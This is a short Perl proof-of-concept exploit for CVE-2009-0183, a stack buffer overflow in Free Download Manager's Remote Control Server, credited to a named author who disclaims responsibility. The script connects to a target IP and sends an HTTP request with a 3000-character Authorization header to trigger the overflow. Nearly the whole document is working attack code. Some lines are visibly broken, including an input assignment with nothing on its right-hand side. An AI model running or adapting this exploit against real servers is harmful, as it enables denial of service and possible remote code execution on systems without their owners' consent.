#!usr/bin/perl -w ####################################################################################### # Stack-based buffer overflow in Remote Control Server in Free Download Manager # (FDM) 2.5 Build 758 and 3.0 Build 844 allows remote attackers to execute # arbitrary code via a long Authorization header in an HTTP request. # Refer: # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0183 # # To run this exploit on MS Windows replace "#!usr/bin/perl -w" with # "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w) # #$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$ #$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$ # # Author: Praveen Darshanam # Email: praveen[underscore]recker[at]sify.com\ # Blog: http://www.darshanams.blogspot.com/ # Date: 04th February, 2009 # ########Thanx to str0ke,milw0rm, @rp m@n, and all the security folks#################### ######################################################################################## use IO::Socket; print("\nEnter IP Address of Remote Control Server(not domain) FDM: \n"); $vuln_host_ip = ; $sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip, PeerPort => 80, Proto => 'tcp') || "Unable to create Socket for HTTP Connection"; $mal_buff="D"x3000; $http_attack = "GET / HTTP/1.1\r\n". "Host: $vuln_host_ip\r\n". "Authorization:$mal_buff\r\n". "Keep-Alive: 300\r\n". "Connection: keep-alive\r\n\r\n"; print $sock_http $http_attack; close($sock_http);